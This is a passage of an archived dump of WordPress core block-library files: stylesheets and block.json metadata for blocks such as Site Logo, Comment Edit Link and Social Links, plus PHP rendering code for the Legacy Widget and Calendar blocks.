site-logo/style.min.css000060400000000705151330427370011105 0ustar00.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}site-logo/block.json000060400000002445151330427370010441 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/site-logo",
	"title": "Site Logo",
	"category": "theme",
	"description": "Display an image to represent this site. Update this block and the changes apply everywhere.",
	"textdomain": "default",
	"attributes": {
		"width": {
			"type": "number"
		},
		"isLink": {
			"type": "boolean",
			"default": true
		},
		"linkTarget": {
			"type": "string",
			"default": "_self"
		},
		"shouldSyncIcon": {
			"type": "boolean"
		}
	},
	"example": {
		"viewportWidth": 500,
		"attributes": {
			"width": 350,
			"className": "block-editor-block-types-list__site-logo-example"
		}
	},
	"supports": {
		"html": false,
		"align": true,
		"alignWide": false,
		"color": {
			"__experimentalDuotone": "img, .components-placeholder__illustration, .components-placeholder::before",
			"text": false,
			"background": false
		},
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"styles": [
		{
			"name": "default",
			"label": "Default",
			"isDefault": true
		},
		{ "name": "rounded", "label": "Rounded" }
	],
	"editorStyle": "wp-block-site-logo-editor",
	"style": "wp-block-site-logo"
}
site-logo/style.css000060400000001001151330427370010311 0ustar00.wp-block-site-logo{
  box-sizing:border-box;
  line-height:0;
}
.wp-block-site-logo a{
  display:inline-block;
  line-height:0;
}
.wp-block-site-logo.is-default-size img{
  height:auto;
  width:120px;
}
.wp-block-site-logo img{
  height:auto;
  max-width:100%;
}
.wp-block-site-logo a,.wp-block-site-logo img{
  border-radius:inherit;
}
.wp-block-site-logo.aligncenter{
  margin-left:auto;
  margin-right:auto;
  text-align:center;
}

:root :where(.wp-block-site-logo.is-style-rounded){
  border-radius:9999px;
}site-logo/editor.min.css000060400000006357151330427370011244 0ustar00.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{display:table;margin-left:auto;margin-right:auto}.wp-block-site-logo a{pointer-events:none}.wp-block-site-logo .custom-logo-link{cursor:inherit}.wp-block-site-logo .custom-logo-link:focus{box-shadow:none}.wp-block-site-logo img{display:block;height:auto;max-width:100%}.wp-block-site-logo.is-transient{position:relative}.wp-block-site-logo.is-transient img{opacity:.3}.wp-block-site-logo.is-transient .components-spinner{left:50%;margin:0;position:absolute;top:50%;transform:translate(-50%,-50%)}.wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{height:60px;width:60px}.wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{border-radius:inherit}.wp-block-site-logo.wp-block-site-logo .components-placeholder{align-items:center;border-radius:inherit;display:flex;height:100%;justify-content:center;min-height:48px;min-width:48px;padding:0;width:100%}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{display:none}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;margin:auto;padding:0;position:relative;width:48px}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{color:inherit}.block-library-site-logo__inspector-upload-container{position:relative}.block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{display:none}.block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{box-shadow:inset 0 0 0 1px #ccc;color:#1e1e1e;display:block;height:40px;width:100%}.block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{color:var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-library-site-logo__inspector-media-replace-container .components-dropdown{display:block}.block-library-site-logo__inspector-media-replace-container img{aspect-ratio:1;border-radius:50%!important;box-shadow:inset 0 0 0 1px #0003;min-width:20px;width:20px}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{display:flex;height:40px;padding:6px 12px}site-logo/editor.css000060400000006775151330427370010466 0ustar00.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{
  display:table;
  margin-left:auto;
  margin-right:auto;
}

.wp-block-site-logo a{
  pointer-events:none;
}
.wp-block-site-logo .custom-logo-link{
  cursor:inherit;
}
.wp-block-site-logo .custom-logo-link:focus{
  box-shadow:none;
}
.wp-block-site-logo img{
  display:block;
  height:auto;
  max-width:100%;
}
.wp-block-site-logo.is-transient{
  position:relative;
}
.wp-block-site-logo.is-transient img{
  opacity:.3;
}
.wp-block-site-logo.is-transient .components-spinner{
  left:50%;
  margin:0;
  position:absolute;
  top:50%;
  transform:translate(-50%, -50%);
}

.wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{
  height:60px;
  width:60px;
}
.wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{
  border-radius:inherit;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder{
  align-items:center;
  border-radius:inherit;
  display:flex;
  height:100%;
  justify-content:center;
  min-height:48px;
  min-width:48px;
  padding:0;
  width:100%;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{
  display:none;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{
  align-items:center;
  background:var(--wp-admin-theme-color);
  border-color:var(--wp-admin-theme-color);
  border-radius:50%;
  border-style:solid;
  color:#fff;
  display:flex;
  height:48px;
  justify-content:center;
  margin:auto;
  padding:0;
  position:relative;
  width:48px;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{
  color:inherit;
}

.block-library-site-logo__inspector-upload-container{
  position:relative;
}
.block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{
  display:none;
}

.block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{
  box-shadow:inset 0 0 0 1px #ccc;
  color:#1e1e1e;
  display:block;
  height:40px;
  width:100%;
}
.block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{
  color:var(--wp-admin-theme-color);
}
.block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{
  box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);
}
.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{
  text-align:start;
  text-align-last:center;
  white-space:normal;
  word-break:break-all;
}

.block-library-site-logo__inspector-media-replace-container .components-dropdown{
  display:block;
}
.block-library-site-logo__inspector-media-replace-container img{
  aspect-ratio:1;
  border-radius:50% !important;
  box-shadow:inset 0 0 0 1px #0003;
  min-width:20px;
  width:20px;
}
.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{
  display:flex;
  height:40px;
  padding:6px 12px;
}site-logo/editor-rtl.min.css000060400000006357151330427370012043 0ustar00.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{display:table;margin-left:auto;margin-right:auto}.wp-block-site-logo a{pointer-events:none}.wp-block-site-logo .custom-logo-link{cursor:inherit}.wp-block-site-logo .custom-logo-link:focus{box-shadow:none}.wp-block-site-logo img{display:block;height:auto;max-width:100%}.wp-block-site-logo.is-transient{position:relative}.wp-block-site-logo.is-transient img{opacity:.3}.wp-block-site-logo.is-transient .components-spinner{margin:0;position:absolute;right:50%;top:50%;transform:translate(50%,-50%)}.wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{height:60px;width:60px}.wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{border-radius:inherit}.wp-block-site-logo.wp-block-site-logo .components-placeholder{align-items:center;border-radius:inherit;display:flex;height:100%;justify-content:center;min-height:48px;min-width:48px;padding:0;width:100%}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{display:none}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{align-items:center;background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);border-radius:50%;border-style:solid;color:#fff;display:flex;height:48px;justify-content:center;margin:auto;padding:0;position:relative;width:48px}.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{color:inherit}.block-library-site-logo__inspector-upload-container{position:relative}.block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{display:none}.block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{box-shadow:inset 0 0 0 1px #ccc;color:#1e1e1e;display:block;height:40px;width:100%}.block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{color:var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{text-align:start;text-align-last:center;white-space:normal;word-break:break-all}.block-library-site-logo__inspector-media-replace-container .components-dropdown{display:block}.block-library-site-logo__inspector-media-replace-container img{aspect-ratio:1;border-radius:50%!important;box-shadow:inset 0 0 0 1px #0003;min-width:20px;width:20px}.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{display:flex;height:40px;padding:6px 12px}site-logo/style-rtl.css000060400000001001151330427370011110 0ustar00.wp-block-site-logo{
  box-sizing:border-box;
  line-height:0;
}
.wp-block-site-logo a{
  display:inline-block;
  line-height:0;
}
.wp-block-site-logo.is-default-size img{
  height:auto;
  width:120px;
}
.wp-block-site-logo img{
  height:auto;
  max-width:100%;
}
.wp-block-site-logo a,.wp-block-site-logo img{
  border-radius:inherit;
}
.wp-block-site-logo.aligncenter{
  margin-left:auto;
  margin-right:auto;
  text-align:center;
}

:root :where(.wp-block-site-logo.is-style-rounded){
  border-radius:9999px;
}site-logo/editor-rtl.css000060400000006775151330427370011265 0ustar00.wp-block-site-logo.aligncenter>div,.wp-block[data-align=center]>.wp-block-site-logo{
  display:table;
  margin-left:auto;
  margin-right:auto;
}

.wp-block-site-logo a{
  pointer-events:none;
}
.wp-block-site-logo .custom-logo-link{
  cursor:inherit;
}
.wp-block-site-logo .custom-logo-link:focus{
  box-shadow:none;
}
.wp-block-site-logo img{
  display:block;
  height:auto;
  max-width:100%;
}
.wp-block-site-logo.is-transient{
  position:relative;
}
.wp-block-site-logo.is-transient img{
  opacity:.3;
}
.wp-block-site-logo.is-transient .components-spinner{
  margin:0;
  position:absolute;
  right:50%;
  top:50%;
  transform:translate(50%, -50%);
}

.wp-block-site-logo.wp-block-site-logo.is-default-size .components-placeholder{
  height:60px;
  width:60px;
}
.wp-block-site-logo.wp-block-site-logo .components-resizable-box__container,.wp-block-site-logo.wp-block-site-logo>div{
  border-radius:inherit;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder{
  align-items:center;
  border-radius:inherit;
  display:flex;
  height:100%;
  justify-content:center;
  min-height:48px;
  min-width:48px;
  padding:0;
  width:100%;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-drop-zone__content-text,.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-form-file-upload{
  display:none;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button{
  align-items:center;
  background:var(--wp-admin-theme-color);
  border-color:var(--wp-admin-theme-color);
  border-radius:50%;
  border-style:solid;
  color:#fff;
  display:flex;
  height:48px;
  justify-content:center;
  margin:auto;
  padding:0;
  position:relative;
  width:48px;
}
.wp-block-site-logo.wp-block-site-logo .components-placeholder .components-button.components-button>svg{
  color:inherit;
}

.block-library-site-logo__inspector-upload-container{
  position:relative;
}
.block-library-site-logo__inspector-upload-container .components-drop-zone__content-icon{
  display:none;
}

.block-library-site-logo__inspector-media-replace-container button.components-button,.block-library-site-logo__inspector-upload-container button.components-button{
  box-shadow:inset 0 0 0 1px #ccc;
  color:#1e1e1e;
  display:block;
  height:40px;
  width:100%;
}
.block-library-site-logo__inspector-media-replace-container button.components-button:hover,.block-library-site-logo__inspector-upload-container button.components-button:hover{
  color:var(--wp-admin-theme-color);
}
.block-library-site-logo__inspector-media-replace-container button.components-button:focus,.block-library-site-logo__inspector-upload-container button.components-button:focus{
  box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);
}
.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-media-replace-title,.block-library-site-logo__inspector-upload-container .block-library-site-logo__inspector-media-replace-title{
  text-align:start;
  text-align-last:center;
  white-space:normal;
  word-break:break-all;
}

.block-library-site-logo__inspector-media-replace-container .components-dropdown{
  display:block;
}
.block-library-site-logo__inspector-media-replace-container img{
  aspect-ratio:1;
  border-radius:50% !important;
  box-shadow:inset 0 0 0 1px #0003;
  min-width:20px;
  width:20px;
}
.block-library-site-logo__inspector-media-replace-container .block-library-site-logo__inspector-readonly-logo-preview{
  display:flex;
  height:40px;
  padding:6px 12px;
}site-logo/style-rtl.min.css000060400000000705151330427370011704 0ustar00.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-site-logo a,.wp-block-site-logo img{border-radius:inherit}.wp-block-site-logo.aligncenter{margin-left:auto;margin-right:auto;text-align:center}:root :where(.wp-block-site-logo.is-style-rounded){border-radius:9999px}comment-edit-link/block.json000060400000002275151330427370012060 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comment-edit-link",
	"title": "Comment Edit Link",
	"category": "theme",
	"ancestor": [ "core/comment-template" ],
	"description": "Displays a link to edit the comment in the WordPress Dashboard. This link is only visible to users with the edit comment capability.",
	"textdomain": "default",
	"usesContext": [ "commentId" ],
	"attributes": {
		"linkTarget": {
			"type": "string",
			"default": "_self"
		},
		"textAlign": {
			"type": "string"
		}
	},
	"supports": {
		"html": false,
		"color": {
			"link": true,
			"gradients": true,
			"text": false,
			"__experimentalDefaultControls": {
				"background": true,
				"link": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
comment-edit-link/style-rtl.css000064400000000067151330427370012545 0ustar00.wp-block-comment-edit-link{
  box-sizing:border-box;
}comment-edit-link/style-rtl.min.css000064400000000062151330427370013322 0ustar00.wp-block-comment-edit-link{box-sizing:border-box}comment-edit-link/style.css000064400000000067151330427370011746 0ustar00.wp-block-comment-edit-link{
  box-sizing:border-box;
}comment-edit-link/style.min.css000064400000000062151330427370012523 0ustar00.wp-block-comment-edit-link{box-sizing:border-box}query-no-results/block.json000060400000001603151330427370012010 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/query-no-results",
	"title": "No results",
	"category": "theme",
	"description": "Contains the block elements used to render content when no query results are found.",
	"parent": [ "core/query" ],
	"textdomain": "default",
	"usesContext": [ "queryId", "query" ],
	"supports": {
		"align": true,
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"link": true
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	}
}
legacy-widget.php000060400000007635151330427370010016 0ustar00<?php
/**
 * Server-side rendering of the `core/legacy-widget` block.
 *
 * @package WordPress
 */

/**
 * Renders the 'core/legacy-widget' block.
 *
 * @since 5.8.0
 *
 * @global int $wp_widget_factory.
 *
 * @param array $attributes The block attributes.
 *
 * @return string Rendered block.
 */
function render_block_core_legacy_widget( $attributes ) {
	global $wp_widget_factory;

	if ( isset( $attributes['id'] ) ) {
		$sidebar_id = wp_find_widgets_sidebar( $attributes['id'] );
		return wp_render_widget( $attributes['id'], $sidebar_id );
	}

	if ( ! isset( $attributes['idBase'] ) ) {
		return '';
	}

	$id_base       = $attributes['idBase'];
	$widget_key    = $wp_widget_factory->get_widget_key( $id_base );
	$widget_object = $wp_widget_factory->get_widget_object( $id_base );

	if ( ! $widget_key || ! $widget_object ) {
		return '';
	}

	if ( isset( $attributes['instance']['encoded'], $attributes['instance']['hash'] ) ) {
		$serialized_instance = base64_decode( $attributes['instance']['encoded'] );
		if ( ! hash_equals( wp_hash( $serialized_instance ), (string) $attributes['instance']['hash'] ) ) {
			return '';
		}
		$instance = unserialize( $serialized_instance );
	} else {
		$instance = array();
	}

	$args = array(
		'widget_id'   => $widget_object->id,
		'widget_name' => $widget_object->name,
	);

	ob_start();
	the_widget( $widget_key, $instance, $args );
	return ob_get_clean();
}

/**
 * Registers the 'core/legacy-widget' block.
 *
 * @since 5.8.0
 */
function register_block_core_legacy_widget() {
	register_block_type_from_metadata(
		__DIR__ . '/legacy-widget',
		array(
			'render_callback' => 'render_block_core_legacy_widget',
		)
	);
}

add_action( 'init', 'register_block_core_legacy_widget' );

/**
 * Intercepts any request with legacy-widget-preview in the query param and, if
 * set, renders a page containing a preview of the requested Legacy Widget
 * block.
 *
 * @since 5.8.0
 */
function handle_legacy_widget_preview_iframe() {
	if ( empty( $_GET['legacy-widget-preview'] ) ) {
		return;
	}

	if ( ! current_user_can( 'edit_theme_options' ) ) {
		return;
	}

	define( 'IFRAME_REQUEST', true );

	?>
	<!doctype html>
	<html <?php language_attributes(); ?>>
	<head>
		<meta charset="<?php bloginfo( 'charset' ); ?>" />
		<meta name="viewport" content="width=device-width, initial-scale=1" />
		<link rel="profile" href="https://gmpg.org/xfn/11" />
		<?php wp_head(); ?>
		<style>
			/* Reset theme styles */
			html, body, #page, #content {
				padding: 0 !important;
				margin: 0 !important;
			}

			/* Hide root level text nodes */
			body {
				font-size: 0 !important;
			}

			/* Hide non-widget elements */
			body *:not(#page):not(#content):not(.widget):not(.widget *) {
				display: none !important;
				font-size: 0 !important;
				height: 0 !important;
				left: -9999px !important;
				max-height: 0 !important;
				max-width: 0 !important;
				opacity: 0 !important;
				pointer-events: none !important;
				position: absolute !important;
				top: -9999px !important;
				transform: translate(-9999px, -9999px) !important;
				visibility: hidden !important;
				z-index: -999 !important;
			}

			/* Restore widget font-size */
			.widget {
				font-size: var(--global--font-size-base);
			}
		</style>
	</head>
	<body <?php body_class(); ?>>
		<div id="page" class="site">
			<div id="content" class="site-content">
				<?php
				$registry = WP_Block_Type_Registry::get_instance();
				$block    = $registry->get_registered( 'core/legacy-widget' );
				echo $block->render( $_GET['legacy-widget-preview'] );
				?>
			</div><!-- #content -->
		</div><!-- #page -->
		<?php wp_footer(); ?>
	</body>
	</html>
	<?php

	exit;
}

// Use admin_init instead of init to ensure get_current_screen function is already available.
// This isn't strictly required, but enables better compatibility with existing plugins.
// See: https://github.com/WordPress/gutenberg/issues/32624.
add_action( 'admin_init', 'handle_legacy_widget_preview_iframe', 20 );
widget-group/block.json000060400000000620151330427370011145 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/widget-group",
	"title": "Widget Group",
	"category": "widgets",
	"attributes": {
		"title": {
			"type": "string"
		}
	},
	"supports": {
		"html": false,
		"inserter": true,
		"customClassName": true,
		"reusable": false
	},
	"editorStyle": "wp-block-widget-group-editor",
	"style": "wp-block-widget-group"
}
calendar.php000060400000013673151330427370007041 0ustar00<?php
/**
 * Server-side rendering of the `core/calendar` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/calendar` block on server.
 *
 * @since 5.2.0
 *
 * @global int $monthnum.
 * @global int $year.
 *
 * @param array $attributes The block attributes.
 *
 * @return string Returns the block content.
 */
function render_block_core_calendar( $attributes ) {
	global $monthnum, $year;

	// Calendar shouldn't be rendered
	// when there are no published posts on the site.
	if ( ! block_core_calendar_has_published_posts() ) {
		if ( is_user_logged_in() ) {
			return '<div>' . __( 'The calendar block is hidden because there are no published posts.' ) . '</div>';
		}
		return '';
	}

	$previous_monthnum = $monthnum;
	$previous_year     = $year;

	if ( isset( $attributes['month'] ) && isset( $attributes['year'] ) ) {
		$permalink_structure = get_option( 'permalink_structure' );
		if (
			str_contains( $permalink_structure, '%monthnum%' ) &&
			str_contains( $permalink_structure, '%year%' )
		) {
			$monthnum = $attributes['month'];
			$year     = $attributes['year'];
		}
	}

	$color_block_styles = array();

	// Text color.
	$preset_text_color          = array_key_exists( 'textColor', $attributes ) ? "var:preset|color|{$attributes['textColor']}" : null;
	$custom_text_color          = $attributes['style']['color']['text'] ?? null;
	$color_block_styles['text'] = $preset_text_color ? $preset_text_color : $custom_text_color;

	// Background Color.
	$preset_background_color          = array_key_exists( 'backgroundColor', $attributes ) ? "var:preset|color|{$attributes['backgroundColor']}" : null;
	$custom_background_color          = $attributes['style']['color']['background'] ?? null;
	$color_block_styles['background'] = $preset_background_color ? $preset_background_color : $custom_background_color;

	// Generate color styles and classes.
	$styles        = wp_style_engine_get_styles( array( 'color' => $color_block_styles ), array( 'convert_vars_to_classnames' => true ) );
	$inline_styles = empty( $styles['css'] ) ? '' : sprintf( ' style="%s"', esc_attr( $styles['css'] ) );
	$classnames    = empty( $styles['classnames'] ) ? '' : ' ' . esc_attr( $styles['classnames'] );
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classnames .= ' has-link-color';
	}
	// Apply color classes and styles to the calendar.
	$calendar = str_replace( '<table', '<table' . $inline_styles, get_calendar( true, false ) );
	$calendar = str_replace( 'class="wp-calendar-table', 'class="wp-calendar-table' . $classnames, $calendar );

	$wrapper_attributes = get_block_wrapper_attributes();
	$output             = sprintf(
		'<div %1$s>%2$s</div>',
		$wrapper_attributes,
		$calendar
	);

	$monthnum = $previous_monthnum;
	$year     = $previous_year;

	return $output;
}

/**
 * Registers the `core/calendar` block on server.
 *
 * @since 5.2.0
 */
function register_block_core_calendar() {
	register_block_type_from_metadata(
		__DIR__ . '/calendar',
		array(
			'render_callback' => 'render_block_core_calendar',
		)
	);
}

add_action( 'init', 'register_block_core_calendar' );

/**
 * Returns whether or not there are any published posts.
 *
 * Used to hide the calendar block when there are no published posts.
 * This compensates for a known Core bug: https://core.trac.wordpress.org/ticket/12016
 *
 * @since 5.9.0
 *
 * @return bool Has any published posts or not.
 */
function block_core_calendar_has_published_posts() {
	// Multisite already has an option that stores the count of the published posts.
	// Let's use that for multisites.
	if ( is_multisite() ) {
		return 0 < (int) get_option( 'post_count' );
	}

	// On single sites we try our own cached option first.
	$has_published_posts = get_option( 'wp_calendar_block_has_published_posts', null );
	if ( null !== $has_published_posts ) {
		return (bool) $has_published_posts;
	}

	// No cache hit, let's update the cache and return the cached value.
	return block_core_calendar_update_has_published_posts();
}

/**
 * Queries the database for any published post and saves
 * a flag whether any published post exists or not.
 *
 * @since 5.9.0
 *
 * @global wpdb $wpdb WordPress database abstraction object.
 *
 * @return bool Has any published posts or not.
 */
function block_core_calendar_update_has_published_posts() {
	global $wpdb;
	$has_published_posts = (bool) $wpdb->get_var( "SELECT 1 as test FROM {$wpdb->posts} WHERE post_type = 'post' AND post_status = 'publish' LIMIT 1" );
	update_option( 'wp_calendar_block_has_published_posts', $has_published_posts );
	return $has_published_posts;
}

// We only want to register these functions and actions when
// we are on single sites. On multi sites we use `post_count` option.
if ( ! is_multisite() ) {
	/**
	 * Handler for updating the has published posts flag when a post is deleted.
	 *
	 * @since 5.9.0
	 *
	 * @param int $post_id Deleted post ID.
	 */
	function block_core_calendar_update_has_published_post_on_delete( $post_id ) {
		$post = get_post( $post_id );

		if ( ! $post || 'publish' !== $post->post_status || 'post' !== $post->post_type ) {
			return;
		}

		block_core_calendar_update_has_published_posts();
	}

	/**
	 * Handler for updating the has published posts flag when a post status changes.
	 *
	 * @since 5.9.0
	 *
	 * @param string  $new_status The status the post is changing to.
	 * @param string  $old_status The status the post is changing from.
	 * @param WP_Post $post       Post object.
	 */
	function block_core_calendar_update_has_published_post_on_transition_post_status( $new_status, $old_status, $post ) {
		if ( $new_status === $old_status ) {
			return;
		}

		if ( 'post' !== get_post_type( $post ) ) {
			return;
		}

		if ( 'publish' !== $new_status && 'publish' !== $old_status ) {
			return;
		}

		block_core_calendar_update_has_published_posts();
	}

	add_action( 'delete_post', 'block_core_calendar_update_has_published_post_on_delete' );
	add_action( 'transition_post_status', 'block_core_calendar_update_has_published_post_on_transition_post_status', 10, 3 );
}
social-links/style.min.css000060400000026520151330427370011576 0ustar00.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{border-bottom:0;box-shadow:none;text-decoration:none}.wp-block-social-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-huge-icon-size{font-size:48px}.wp-block-social-links.aligncenter{display:flex;justify-content:center}.wp-block-social-links.alignright{justify-content:flex-end}.wp-block-social-link{border-radius:9999px;display:block;height:auto;transition:transform .1s ease}@media (prefers-reduced-motion:reduce){.wp-block-social-link{transition-delay:0s;transition-duration:0s}}.wp-block-social-link a{align-items:center;display:flex;line-height:0;transition:transform .1s ease}.wp-block-social-link:hover{transform:scale(1.1)}.wp-block-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{background-color:#f0f0f0;color:#444}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{background-color:#f90;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{background-color:#1ea0c3;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{background-color:#0757fe;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{background-color:#0a7aff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{background-color:#1e1f26;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{background-color:#02e49b;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{background-color:#e94c89;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{background-color:#f45800;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{background-color:#1778f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{background-color:#0461dd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{background-color:#e65678;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{background-color:#24292d;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{background-color:#eceadd;color:#382110}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{background-color:#ea4434;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) 